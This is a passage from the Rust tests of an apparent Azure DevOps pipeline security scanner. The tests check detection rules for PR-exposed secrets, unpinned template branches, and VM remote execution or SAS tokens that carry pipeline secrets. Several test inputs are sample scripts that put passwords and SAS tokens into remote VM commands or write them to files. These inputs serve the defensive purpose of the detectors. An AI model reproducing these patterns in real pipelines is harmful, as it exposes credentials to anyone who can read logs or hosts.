7720        let mut pool_meta = std::collections::HashMap::new();
7721        pool_meta.insert(META_SELF_HOSTED.into(), "true".into());
7722        g.add_node_with_metadata(
7723            NodeKind::Image,
7724            "self-hosted-pool",
7725            TrustZone::FirstParty,
7726            pool_meta,
7727        );
7728
7729        let mut step_meta = std::collections::HashMap::new();
7730        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7731        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7732
7733        let findings = self_hosted_pool_pr_hijack(&g);
7734        assert!(
7735            findings.is_empty(),
7736            "no PR trigger → self_hosted_pool_pr_hijack must not fire"
7737        );
7738    }
7739
7740    #[test]
7741    fn service_connection_scope_mismatch_fires_on_pr_broad_non_oidc() {
7742        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7743        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7744
7745        let mut sc_meta = std::collections::HashMap::new();
7746        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7747        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7748        // No META_OIDC → treated as not OIDC-federated
7749        let sc = g.add_node_with_metadata(
7750            NodeKind::Identity,
7751            "prod-azure-sc",
7752            TrustZone::FirstParty,
7753            sc_meta,
7754        );
7755        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7756        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7757
7758        let findings = service_connection_scope_mismatch(&g);
7759        assert_eq!(findings.len(), 1);
7760        assert_eq!(findings[0].severity, Severity::High);
7761        assert_eq!(
7762            findings[0].category,
7763            FindingCategory::ServiceConnectionScopeMismatch
7764        );
7765        assert!(findings[0].message.contains("prod-azure-sc"));
7766    }
7767
7768    #[test]
7769    fn service_connection_scope_mismatch_no_fire_without_pr_trigger() {
7770        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7771        // No trigger metadata
7772        let mut sc_meta = std::collections::HashMap::new();
7773        sc_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7774        sc_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7775        let sc = g.add_node_with_metadata(
7776            NodeKind::Identity,
7777            "prod-azure-sc",
7778            TrustZone::FirstParty,
7779            sc_meta,
7780        );
7781        let step = g.add_node(NodeKind::Step, "deploy", TrustZone::FirstParty);
7782        g.add_edge(step, sc, EdgeKind::HasAccessTo);
7783
7784        let findings = service_connection_scope_mismatch(&g);
7785        assert!(
7786            findings.is_empty(),
7787            "no PR trigger → service_connection_scope_mismatch must not fire"
7788        );
7789    }
7790
7791    #[test]
7792    fn checkout_self_pr_exposure_fires_on_pr_trigger() {
7793        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7794        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7795        let mut step_meta = std::collections::HashMap::new();
7796        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7797        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7798
7799        let findings = checkout_self_pr_exposure(&g);
7800        assert_eq!(findings.len(), 1);
7801        assert_eq!(
7802            findings[0].category,
7803            FindingCategory::CheckoutSelfPrExposure
7804        );
7805        assert_eq!(findings[0].severity, Severity::High);
7806    }
7807
7808    #[test]
7809    fn checkout_self_pr_exposure_no_fire_without_pr_trigger() {
7810        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7811        // No META_TRIGGER set
7812        let mut step_meta = std::collections::HashMap::new();
7813        step_meta.insert(META_CHECKOUT_SELF.into(), "true".into());
7814        g.add_node_with_metadata(NodeKind::Step, "checkout", TrustZone::FirstParty, step_meta);
7815
7816        let findings = checkout_self_pr_exposure(&g);
7817        assert!(
7818            findings.is_empty(),
7819            "no PR trigger → checkout_self_pr_exposure must not fire"
7820        );
7821    }
7822
7823    #[test]
7824    fn variable_group_in_pr_job_uses_cellos_remediation() {
7825        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7826        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7827
7828        let mut secret_meta = std::collections::HashMap::new();
7829        secret_meta.insert(META_VARIABLE_GROUP.into(), "true".into());
7830        let secret = g.add_node_with_metadata(
7831            NodeKind::Secret,
7832            "prod-secret",
7833            TrustZone::FirstParty,
7834            secret_meta,
7835        );
7836        let step = g.add_node(NodeKind::Step, "deploy step", TrustZone::Untrusted);
7837        g.add_edge(step, secret, EdgeKind::HasAccessTo);
7838
7839        let findings = variable_group_in_pr_job(&g);
7840        assert!(!findings.is_empty());
7841        assert!(
7842            matches!(
7843                findings[0].recommendation,
7844                Recommendation::CellosRemediation { .. }
7845            ),
7846            "variable_group_in_pr_job must recommend CellosRemediation"
7847        );
7848    }
7849
7850    #[test]
7851    fn service_connection_scope_mismatch_uses_cellos_remediation() {
7852        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7853        g.metadata.insert(META_TRIGGER.into(), "pr".into());
7854
7855        let mut id_meta = std::collections::HashMap::new();
7856        id_meta.insert(META_SERVICE_CONNECTION.into(), "true".into());
7857        id_meta.insert(META_IDENTITY_SCOPE.into(), "broad".into());
7858        // No META_OIDC → treated as not OIDC-federated
7859        let identity = g.add_node_with_metadata(
7860            NodeKind::Identity,
7861            "sub-conn",
7862            TrustZone::FirstParty,
7863            id_meta,
7864        );
7865        let step = g.add_node(NodeKind::Step, "azure deploy", TrustZone::Untrusted);
7866        g.add_edge(step, identity, EdgeKind::HasAccessTo);
7867
7868        let findings = service_connection_scope_mismatch(&g);
7869        assert!(!findings.is_empty());
7870        assert!(
7871            matches!(
7872                findings[0].recommendation,
7873                Recommendation::CellosRemediation { .. }
7874            ),
7875            "service_connection_scope_mismatch must recommend CellosRemediation"
7876        );
7877    }
7878
7879    /// Build a propagation graph with an optional approval-gated middle step:
7880    ///   Secret → middle Step (FirstParty) → Artifact → ThirdParty Step.
7881    /// When `gated` is true the middle step carries META_ENV_APPROVAL.
7882    fn build_env_approval_graph(gated: bool) -> AuthorityGraph {
7883        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7884
7885        let secret = g.add_node(NodeKind::Secret, "DEPLOY_KEY", TrustZone::FirstParty);
7886        let mut middle_meta = std::collections::HashMap::new();
7887        if gated {
7888            middle_meta.insert(META_ENV_APPROVAL.into(), "true".into());
7889        }
7890        let middle = g.add_node_with_metadata(
7891            NodeKind::Step,
7892            "deploy-prod",
7893            TrustZone::FirstParty,
7894            middle_meta,
7895        );
7896        let artifact = g.add_node(NodeKind::Artifact, "release.tar", TrustZone::FirstParty);
7897        let third = g.add_node(
7898            NodeKind::Step,
7899            "third-party/uploader",
7900            TrustZone::ThirdParty,
7901        );
7902
7903        g.add_edge(middle, secret, EdgeKind::HasAccessTo);
7904        g.add_edge(middle, artifact, EdgeKind::Produces);
7905        g.add_edge(artifact, third, EdgeKind::Consumes);
7906
7907        g
7908    }
7909
7910    #[test]
7911    fn env_approval_gate_reduces_propagation_severity() {
7912        // Baseline: no gate → Critical (third-party sink, not SHA-pinned)
7913        let baseline = authority_propagation(&build_env_approval_graph(false), 4);
7914        let baseline_finding = baseline
7915            .iter()
7916            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7917            .expect("baseline must produce an AuthorityPropagation finding");
7918        assert_eq!(baseline_finding.severity, Severity::Critical);
7919        assert!(!baseline_finding
7920            .message
7921            .contains("environment approval gate"));
7922
7923        // Gated: same shape, middle step tagged → severity drops one step to High
7924        let gated = authority_propagation(&build_env_approval_graph(true), 4);
7925        let gated_finding = gated
7926            .iter()
7927            .find(|f| f.category == FindingCategory::AuthorityPropagation)
7928            .expect("gated must produce an AuthorityPropagation finding");
7929        assert_eq!(
7930            gated_finding.severity,
7931            Severity::High,
7932            "Critical must downgrade to High when path crosses an env-approval gate"
7933        );
7934        assert!(
7935            gated_finding
7936                .message
7937                .contains("(mitigated: environment approval gate)"),
7938            "gated finding must annotate the mitigation in its message"
7939        );
7940    }
7941
7942    #[test]
7943    fn downgrade_one_step_table() {
7944        assert_eq!(downgrade_one_step(Severity::Critical), Severity::High);
7945        assert_eq!(downgrade_one_step(Severity::High), Severity::Medium);
7946        assert_eq!(downgrade_one_step(Severity::Medium), Severity::Low);
7947        assert_eq!(downgrade_one_step(Severity::Low), Severity::Low);
7948        assert_eq!(downgrade_one_step(Severity::Info), Severity::Info);
7949    }
7950
7951    // ── template_extends_unpinned_branch ──────────────────────
7952
7953    /// Build a graph whose META_REPOSITORIES carries a single repo descriptor.
7954    /// `git_ref` of `None` encodes the "no `ref:` field" case (default branch).
7955    fn graph_with_repo(
7956        alias: &str,
7957        repo_type: &str,
7958        name: &str,
7959        git_ref: Option<&str>,
7960        used: bool,
7961    ) -> AuthorityGraph {
7962        let mut g = AuthorityGraph::new(source("azure-pipelines.yml"));
7963        let mut obj = serde_json::Map::new();
7964        obj.insert("alias".into(), serde_json::Value::String(alias.into()));
7965        obj.insert(
7966            "repo_type".into(),
7967            serde_json::Value::String(repo_type.into()),
7968        );
7969        obj.insert("name".into(), serde_json::Value::String(name.into()));
7970        if let Some(r) = git_ref {
7971            obj.insert("ref".into(), serde_json::Value::String(r.into()));
7972        }
7973        obj.insert("used".into(), serde_json::Value::Bool(used));
7974        let arr = serde_json::Value::Array(vec![serde_json::Value::Object(obj)]);
7975        g.metadata.insert(
7976            META_REPOSITORIES.into(),
7977            serde_json::to_string(&arr).unwrap(),
7978        );
7979        g
7980    }
7981
7982    // ── vm_remote_exec_via_pipeline_secret ──────────────
7983
7984    /// Helper: build a graph with one Step that has the given inline script
7985    /// body and (optionally) a HasAccessTo edge to a Secret named `sas_var`.
7986    fn graph_with_script_step(body: &str, secret_name: Option<&str>) -> AuthorityGraph {
7987        let mut g = AuthorityGraph::new(source("ado.yml"));
7988        let mut meta = std::collections::HashMap::new();
7989        meta.insert(META_SCRIPT_BODY.into(), body.into());
7990        let step_id =
7991            g.add_node_with_metadata(NodeKind::Step, "deploy-vm", TrustZone::FirstParty, meta);
7992        if let Some(name) = secret_name {
7993            let sec = g.add_node(NodeKind::Secret, name, TrustZone::FirstParty);
7994            g.add_edge(step_id, sec, EdgeKind::HasAccessTo);
7995        }
7996        g
7997    }
7998
7999    // ── secret_to_inline_script_env_export ────────────────────
8000
8001    /// Build a graph with one Step that has access to `secret_name` and
8002    /// stamps `script` as the META_SCRIPT_BODY.
8003    fn build_step_with_script(secret_name: &str, script: &str) -> AuthorityGraph {
8004        let mut g = AuthorityGraph::new(source("ado.yml"));
8005        let secret = g.add_node(NodeKind::Secret, secret_name, TrustZone::FirstParty);
8006        let mut meta = std::collections::HashMap::new();
8007        meta.insert(META_SCRIPT_BODY.into(), script.into());
8008        let step = g.add_node_with_metadata(NodeKind::Step, "deploy", TrustZone::FirstParty, meta);
8009        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8010        g
8011    }
8012
8013    #[test]
8014    fn template_extends_unpinned_branch_fires_on_missing_ref() {
8015        let g = graph_with_repo(
8016            "template-library",
8017            "git",
8018            "Template Library/Library",
8019            None,
8020            true,
8021        );
8022        let findings = template_extends_unpinned_branch(&g);
8023        assert_eq!(findings.len(), 1);
8024        assert_eq!(
8025            findings[0].category,
8026            FindingCategory::TemplateExtendsUnpinnedBranch
8027        );
8028        assert_eq!(findings[0].severity, Severity::High);
8029        assert!(findings[0].message.contains("default branch"));
8030    }
8031
8032    #[test]
8033    fn template_extends_unpinned_branch_fires_on_refs_heads_main() {
8034        let g = graph_with_repo(
8035            "templates",
8036            "git",
8037            "org/templates",
8038            Some("refs/heads/main"),
8039            true,
8040        );
8041        let findings = template_extends_unpinned_branch(&g);
8042        assert_eq!(findings.len(), 1);
8043        assert!(findings[0].message.contains("mutable branch 'main'"));
8044    }
8045
8046    #[test]
8047    fn template_extends_unpinned_branch_skips_tag_pinned() {
8048        let g = graph_with_repo(
8049            "templates",
8050            "github",
8051            "org/templates",
8052            Some("refs/tags/v1.0.0"),
8053            true,
8054        );
8055        let findings = template_extends_unpinned_branch(&g);
8056        assert!(
8057            findings.is_empty(),
8058            "refs/tags/v1.0.0 must be treated as pinned"
8059        );
8060    }
8061
8062    #[test]
8063    fn template_extends_unpinned_branch_skips_sha_pinned() {
8064        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8065        assert_eq!(sha.len(), 40);
8066        let g = graph_with_repo("templates", "git", "org/templates", Some(sha), true);
8067        let findings = template_extends_unpinned_branch(&g);
8068        assert!(
8069            findings.is_empty(),
8070            "40-char hex SHA must be treated as pinned"
8071        );
8072    }
8073
8074    #[test]
8075    fn template_extends_unpinned_branch_skips_unreferenced_repo_with_no_ref() {
8076        // Spec edge: "repo declared but not referenced anywhere → does not fire
8077        // (no consumer = no risk)". Applies when the declaration carries no
8078        // explicit `ref:` field — the entry is purely vestigial in that case.
8079        let g = graph_with_repo(
8080            "templates",
8081            "git",
8082            "org/templates",
8083            None,  // no explicit ref
8084            false, // and no consumer
8085        );
8086        let findings = template_extends_unpinned_branch(&g);
8087        assert!(
8088            findings.is_empty(),
8089            "repo declared with no ref and no consumer must not fire"
8090        );
8091    }
8092
8093    #[test]
8094    fn template_extends_unpinned_branch_fires_on_explicit_branch_even_without_in_file_consumer() {
8095        // An explicit `ref: refs/heads/<branch>` signals intent to consume —
8096        // the consumer is typically inside an included template file outside
8097        // the per-file scan boundary (mirrors the msigeurope corpus shape).
8098        let g = graph_with_repo(
8099            "adf_publish",
8100            "git",
8101            "org/finance-reporting",
8102            Some("refs/heads/adf_publish"),
8103            false, // no in-file consumer
8104        );
8105        let findings = template_extends_unpinned_branch(&g);
8106        assert_eq!(findings.len(), 1);
8107        assert!(findings[0].message.contains("mutable branch 'adf_publish'"));
8108    }
8109
8110    #[test]
8111    fn template_extends_unpinned_branch_skips_when_metadata_absent() {
8112        let g = AuthorityGraph::new(source("ci.yml"));
8113        assert!(template_extends_unpinned_branch(&g).is_empty());
8114    }
8115
8116    #[test]
8117    fn template_extends_unpinned_branch_handles_bare_branch_name() {
8118        // `ref: main` (no `refs/heads/` prefix) is a valid ADO shorthand for a branch.
8119        let g = graph_with_repo(
8120            "template-library",
8121            "git",
8122            "Template Library/Library",
8123            Some("main"),
8124            true,
8125        );
8126        let findings = template_extends_unpinned_branch(&g);
8127        assert_eq!(findings.len(), 1);
8128        assert!(findings[0].message.contains("mutable branch 'main'"));
8129    }
8130
8131    // ── template_repo_ref_is_feature_branch ───────────────────
8132
8133    #[test]
8134    fn template_repo_ref_is_feature_branch_fires_on_bare_feature_branch() {
8135        // Mirrors the corpus shape: `ref: feature/maps-network` (no
8136        // `refs/heads/` prefix) on the Template Library checkout.
8137        let g = graph_with_repo(
8138            "templateLibRepo",
8139            "git",
8140            "Template Library/Template Library",
8141            Some("feature/maps-network"),
8142            true,
8143        );
8144        let findings = template_repo_ref_is_feature_branch(&g);
8145        assert_eq!(findings.len(), 1);
8146        assert_eq!(
8147            findings[0].category,
8148            FindingCategory::TemplateRepoRefIsFeatureBranch
8149        );
8150        assert_eq!(findings[0].severity, Severity::High);
8151        assert!(findings[0].message.contains("feature/maps-network"));
8152        assert!(findings[0].message.contains("feature-class"));
8153    }
8154
8155    #[test]
8156    fn template_repo_ref_is_feature_branch_fires_on_refs_heads_feature() {
8157        // Same attack via the fully-qualified `refs/heads/feature/...` form.
8158        let g = graph_with_repo(
8159            "templates",
8160            "git",
8161            "org/templates",
8162            Some("refs/heads/feature/wip"),
8163            true,
8164        );
8165        let findings = template_repo_ref_is_feature_branch(&g);
8166        assert_eq!(findings.len(), 1);
8167        assert!(findings[0].message.contains("feature/wip"));
8168    }
8169
8170    #[test]
8171    fn template_repo_ref_is_feature_branch_fires_on_develop_branch() {
8172        // `develop` is not in the trunk set — it's a feature-class branch.
8173        let g = graph_with_repo(
8174            "templates",
8175            "git",
8176            "org/templates",
8177            Some("refs/heads/develop"),
8178            true,
8179        );
8180        let findings = template_repo_ref_is_feature_branch(&g);
8181        assert_eq!(findings.len(), 1);
8182    }
8183
8184    #[test]
8185    fn template_repo_ref_is_feature_branch_skips_main_branch() {
8186        // `template_extends_unpinned_branch` still fires on this — but the
8187        // feature-branch refinement does not, because main is the trunk.
8188        let g = graph_with_repo(
8189            "templates",
8190            "git",
8191            "org/templates",
8192            Some("refs/heads/main"),
8193            true,
8194        );
8195        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8196        // Sanity: the parent rule still fires on the same input.
8197        assert_eq!(template_extends_unpinned_branch(&g).len(), 1);
8198    }
8199
8200    #[test]
8201    fn template_repo_ref_is_feature_branch_skips_master_release_hotfix() {
8202        for ref_value in [
8203            "master",
8204            "refs/heads/master",
8205            "release/v1.4",
8206            "refs/heads/release/2026-q2",
8207            "releases/2026-04",
8208            "hotfix/CVE-2026-0001",
8209            "refs/heads/hotfix/CVE-2026-0002",
8210        ] {
8211            let g = graph_with_repo("t", "git", "org/t", Some(ref_value), true);
8212            assert!(
8213                template_repo_ref_is_feature_branch(&g).is_empty(),
8214                "ref {ref_value:?} must not fire as feature-class"
8215            );
8216        }
8217    }
8218
8219    #[test]
8220    fn template_repo_ref_is_feature_branch_skips_pinned_refs() {
8221        // SHA, tag, and refs/heads/<sha> are all pinned — the feature-branch
8222        // rule must not fire on any of them, regardless of the alias name.
8223        let sha = "a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6e7f8a9b0";
8224        for ref_value in [
8225            sha.to_string(),
8226            "refs/tags/v1.4.2".to_string(),
8227            format!("refs/heads/{sha}"),
8228        ] {
8229            let g = graph_with_repo("templates", "git", "org/t", Some(&ref_value), true);
8230            assert!(
8231                template_repo_ref_is_feature_branch(&g).is_empty(),
8232                "pinned ref {ref_value:?} must not fire"
8233            );
8234        }
8235    }
8236
8237    #[test]
8238    fn template_repo_ref_is_feature_branch_skips_when_ref_absent() {
8239        // The "no ref:" (default-branch) case is left to
8240        // `template_extends_unpinned_branch`. The feature-branch rule only
8241        // fires on explicit feature-class refs.
8242        let g = graph_with_repo("templates", "git", "org/templates", None, true);
8243        assert!(template_repo_ref_is_feature_branch(&g).is_empty());
8244    }
8245
8246    #[test]
8247    fn template_repo_ref_is_feature_branch_cofires_with_parent_rule() {
8248        // Both rules should fire together on the corpus shape — the parent
8249        // says "not pinned", the refinement says "and it's a feature branch".
8250        let g = graph_with_repo(
8251            "templateLibRepo",
8252            "git",
8253            "Template Library/Template Library",
8254            Some("feature/maps-network"),
8255            true,
8256        );
8257        let parent = template_extends_unpinned_branch(&g);
8258        let refinement = template_repo_ref_is_feature_branch(&g);
8259        assert_eq!(parent.len(), 1, "parent rule must still fire");
8260        assert_eq!(refinement.len(), 1, "refinement must fire alongside");
8261        assert_ne!(parent[0].category, refinement[0].category);
8262    }
8263
8264    #[test]
8265    fn is_feature_class_branch_classification() {
8266        // Trunk-class — must return false.
8267        for b in [
8268            "main",
8269            "MAIN",
8270            "master",
8271            "refs/heads/main",
8272            "release/v1",
8273            "release/",
8274            "release",
8275            "releases/2026",
8276            "hotfix/x",
8277            "hotfix",
8278            "hotfixes/y",
8279            "  refs/heads/main  ",
8280        ] {
8281            assert!(!is_feature_class_branch(b), "{b:?} must be trunk");
8282        }
8283        // Feature-class — must return true.
8284        for b in [
8285            "feature/foo",
8286            "topic/bar",
8287            "dev/wip",
8288            "wip/x",
8289            "develop",
8290            "users/alice/spike",
8291            "personal-branch",
8292            "refs/heads/feature/x",
8293            "main-staging", // not exact main, prefix-only — feature-class
8294        ] {
8295            assert!(is_feature_class_branch(b), "{b:?} must be feature-class");
8296        }
8297        // Empty / whitespace.
8298        assert!(!is_feature_class_branch(""));
8299        assert!(!is_feature_class_branch("   "));
8300    }
8301
8302    #[test]
8303    fn template_extends_unpinned_branch_skips_refs_heads_with_sha() {
8304        // ADO accepts `ref: refs/heads/<sha>` to lock onto a commit on a branch.
8305        // The trailing segment is what determines mutability.
8306        let sha = "0123456789abcdef0123456789abcdef01234567";
8307        let g = graph_with_repo(
8308            "templates",
8309            "git",
8310            "org/templates",
8311            Some(&format!("refs/heads/{sha}")),
8312            true,
8313        );
8314        let findings = template_extends_unpinned_branch(&g);
8315        assert!(findings.is_empty());
8316    }
8317
8318    // ── vm_remote_exec_via_pipeline_secret ──────────────
8319
8320    #[test]
8321    fn vm_remote_exec_fires_on_set_azvmextension_with_minted_sas() {
8322        let body = r#"
8323            $sastokenpackages = New-AzStorageContainerSASToken -Container $packagecontainer -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8324            Set-AzVMExtension -ResourceGroupName $vmRG -VMName $vm.name -Name 'customScript' `
8325                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8326                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -saskey `"$sastokenpackages`"" }
8327        "#;
8328        let g = graph_with_script_step(body, None);
8329        let findings = vm_remote_exec_via_pipeline_secret(&g);
8330        assert_eq!(findings.len(), 1, "should fire once");
8331        assert_eq!(
8332            findings[0].category,
8333            FindingCategory::VmRemoteExecViaPipelineSecret
8334        );
8335        assert_eq!(findings[0].severity, Severity::High);
8336    }
8337
8338    #[test]
8339    fn vm_remote_exec_fires_on_invoke_azvmruncommand_with_pipeline_secret() {
8340        let body = r#"
8341            Invoke-AzVMRunCommand -ResourceGroupName rg -VMName vm `
8342                -CommandId RunPowerShellScript -ScriptString "Add-LocalGroupMember -Member admin -Password $(DOMAIN_JOIN_PASSWORD)"
8343        "#;
8344        let g = graph_with_script_step(body, Some("DOMAIN_JOIN_PASSWORD"));
8345        let findings = vm_remote_exec_via_pipeline_secret(&g);
8346        assert_eq!(findings.len(), 1);
8347        assert!(findings[0]
8348            .message
8349            .contains("interpolating a pipeline secret"));
8350    }
8351
8352    #[test]
8353    fn vm_remote_exec_does_not_fire_without_remote_exec_call() {
8354        // Has a SAS mint, but no VM remote-exec primitive — should not fire.
8355        let body = r#"
8356            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8357            Write-Host "sas length is $($sas.Length)"
8358        "#;
8359        let g = graph_with_script_step(body, None);
8360        let findings = vm_remote_exec_via_pipeline_secret(&g);
8361        assert!(findings.is_empty());
8362    }
8363
8364    #[test]
8365    fn vm_remote_exec_does_not_fire_when_remote_exec_has_no_secret_or_sas() {
8366        // Set-AzVMExtension with a static command line, no SAS, no secret —
8367        // should not fire (no exposed credential).
8368        let body = r#"
8369            Set-AzVMExtension -ResourceGroupName rg -VMName vm -Name diag `
8370                -Publisher Microsoft.Azure.Diagnostics -ExtensionType IaaSDiagnostics `
8371                -Settings @{ "xmlCfg" = "<wadcfg/>" }
8372        "#;
8373        let g = graph_with_script_step(body, None);
8374        let findings = vm_remote_exec_via_pipeline_secret(&g);
8375        assert!(
8376            findings.is_empty(),
8377            "no SAS-mint and no secret interpolation → no finding"
8378        );
8379    }
8380
8381    #[test]
8382    fn vm_remote_exec_fires_on_az_cli_run_command() {
8383        let body = r#"
8384            az vm run-command invoke --resource-group rg --name vm `
8385                --command-id RunShellScript --scripts "echo $(DB_PASSWORD) > /tmp/x"
8386        "#;
8387        let g = graph_with_script_step(body, Some("DB_PASSWORD"));
8388        let findings = vm_remote_exec_via_pipeline_secret(&g);
8389        assert_eq!(findings.len(), 1);
8390        assert!(findings[0].message.contains("az vm run-command"));
8391    }
8392
8393    // ── short_lived_sas_in_command_line ─────────────────
8394
8395    #[test]
8396    fn sas_in_cmdline_fires_on_minted_sas_interpolated_into_command_to_execute() {
8397        let body = r#"
8398            $sastokenpackages = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8399            $settings = @{ "commandToExecute" = "powershell install.ps1 -sas `"$sastokenpackages`"" }
8400        "#;
8401        let g = graph_with_script_step(body, None);
8402        let findings = short_lived_sas_in_command_line(&g);
8403        assert_eq!(findings.len(), 1);
8404        assert_eq!(
8405            findings[0].category,
8406            FindingCategory::ShortLivedSasInCommandLine
8407        );
8408        assert_eq!(findings[0].severity, Severity::Medium);
8409        assert!(findings[0].message.contains("sastokenpackages"));
8410    }
8411
8412    #[test]
8413    fn sas_in_cmdline_does_not_fire_when_sas_is_only_uploaded_to_blob() {
8414        // SAS minted but never put on argv — only used to build a URL.
8415        let body = r#"
8416            $sas = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(1)
8417            $url = "https://acct.blob.core.windows.net/c/?" + $sas
8418            Invoke-WebRequest -Uri $url -OutFile foo.zip
8419        "#;
8420        let g = graph_with_script_step(body, None);
8421        let findings = short_lived_sas_in_command_line(&g);
8422        assert!(findings.is_empty(), "no command-line sink → no finding");
8423    }
8424
8425    #[test]
8426    fn sas_in_cmdline_does_not_fire_without_sas_mint() {
8427        let body = r#"
8428            $settings = @{ "commandToExecute" = "powershell -File foo.ps1" }
8429        "#;
8430        let g = graph_with_script_step(body, None);
8431        let findings = short_lived_sas_in_command_line(&g);
8432        assert!(findings.is_empty());
8433    }
8434
8435    #[test]
8436    fn sas_in_cmdline_fires_on_az_cli_generate_sas_with_arguments() {
8437        let body = r#"
8438            sas=$(az storage container generate-sas --name c --account-name acct --permissions r --expiry 2099-01-01 -o tsv)
8439            az vm extension set --vm-name vm --resource-group rg --name CustomScript --publisher Microsoft.Compute \
8440                --settings "{ \"commandToExecute\": \"curl https://acct.blob.core.windows.net/c/foo?$sas\" }"
8441        "#;
8442        let g = graph_with_script_step(body, None);
8443        let findings = short_lived_sas_in_command_line(&g);
8444        // mint + sink in same script → fires (fallback evidence path).
8445        assert_eq!(findings.len(), 1);
8446    }
8447
8448    #[test]
8449    fn co_fire_on_solarwinds_pattern() {
8450        // Mirrors the corpus solarwinds shape: SAS minted, embedded in
8451        // CustomScriptExtension commandToExecute. Both rules must fire.
8452        let body = r#"
8453            $sastokenpackages = New-AzStorageContainerSASToken -Container $pc -Context $ctx -Permission r -ExpiryTime (Get-Date).AddHours(3)
8454            Set-AzVMExtension -ResourceGroupName $rg -VMName $vm `
8455                -Publisher 'Microsoft.Compute' -ExtensionType 'CustomScriptExtension' `
8456                -Settings @{ "commandToExecute" = "powershell -File install.ps1 -sas `"$sastokenpackages`"" }
8457        "#;
8458        let g = graph_with_script_step(body, None);
8459        let r6 = vm_remote_exec_via_pipeline_secret(&g);
8460        let r7 = short_lived_sas_in_command_line(&g);
8461        assert_eq!(r6.len(), 1, "rule 6 must fire on solarwinds shape");
8462        assert_eq!(r7.len(), 1, "rule 7 must fire on solarwinds shape");
8463    }
8464
8465    #[test]
8466    fn body_interpolates_var_does_not_match_prefix() {
8467        // `$sas` should not match `$sastokenpackages`.
8468        assert!(!body_interpolates_var(
8469            "Write-Host $sastokenpackages",
8470            "sas"
8471        ));
8472        assert!(body_interpolates_var(
8473            "Write-Host $sastokenpackages",
8474            "sastokenpackages"
8475        ));
8476        assert!(body_interpolates_var("echo $(SECRET)", "SECRET"));
8477    }
8478
8479    #[test]
8480    fn powershell_sas_assignments_extracts_var_names() {
8481        let body = r#"
8482            $a = New-AzStorageContainerSASToken -Container c -Context $ctx -Permission r
8483            $b = Get-Date
8484            $sasBlob = New-AzStorageBlobSASToken -Container c -Blob foo -Context $ctx -Permission r
8485        "#;
8486        let names = powershell_sas_assignments(body);
8487        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("a")));
8488        assert!(names.iter().any(|n| n.eq_ignore_ascii_case("sasBlob")));
8489        assert!(!names.iter().any(|n| n.eq_ignore_ascii_case("b")));
8490    }
8491
8492    #[test]
8493    fn bash_export_of_pipeline_secret_flagged() {
8494        let g = build_step_with_script(
8495            "TF_TOKEN",
8496            "echo init\nexport TF_TOKEN_app_terraform_io=\"$(TF_TOKEN)\"\nterraform init",
8497        );
8498        let findings = secret_to_inline_script_env_export(&g);
8499        assert_eq!(findings.len(), 1);
8500        assert_eq!(findings[0].severity, Severity::High);
8501        assert!(findings[0].message.contains("$(TF_TOKEN)"));
8502    }
8503
8504    #[test]
8505    fn powershell_assignment_of_pipeline_secret_flagged() {
8506        let g = build_step_with_script(
8507            "AppContainerDBPassword",
8508            "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n$x = 1",
8509        );
8510        let findings = secret_to_inline_script_env_export(&g);
8511        assert_eq!(findings.len(), 1);
8512        assert!(findings[0].message.contains("$(AppContainerDBPassword)"));
8513    }
8514
8515    #[test]
8516    fn secret_passed_as_command_argument_not_flagged() {
8517        // Secret used as a CLI argument, not assigned to a variable. This is
8518        // covered by the separate META_CLI_FLAG_EXPOSED detection — env_export
8519        // should NOT also fire here.
8520        let g = build_step_with_script("TF_TOKEN", "terraform plan -var \"token=$(TF_TOKEN)\"");
8521        let findings = secret_to_inline_script_env_export(&g);
8522        assert!(
8523            findings.is_empty(),
8524            "command-arg use of $(SECRET) must not trip env-export rule"
8525        );
8526    }
8527
8528    #[test]
8529    fn step_without_script_body_not_flagged() {
8530        let mut g = AuthorityGraph::new(source("ado.yml"));
8531        let secret = g.add_node(NodeKind::Secret, "TF_TOKEN", TrustZone::FirstParty);
8532        let step = g.add_node(NodeKind::Step, "task", TrustZone::FirstParty);
8533        g.add_edge(step, secret, EdgeKind::HasAccessTo);
8534        let findings = secret_to_inline_script_env_export(&g);
8535        assert!(findings.is_empty());
8536    }
8537
8538    // ── secret_materialised_to_workspace_file ────────────────
8539
8540    #[test]
8541    fn powershell_outfile_of_secret_to_workspace_flagged() {
8542        // Mirrors Azure_Landing_Zone/userapp-n8nx pattern: secret bound to
8543        // $var, then $var written via Out-File to $(System.DefaultWorkingDirectory).
8544        let script = "$AppContainerDBPassword = \"$(AppContainerDBPassword)\"\n\
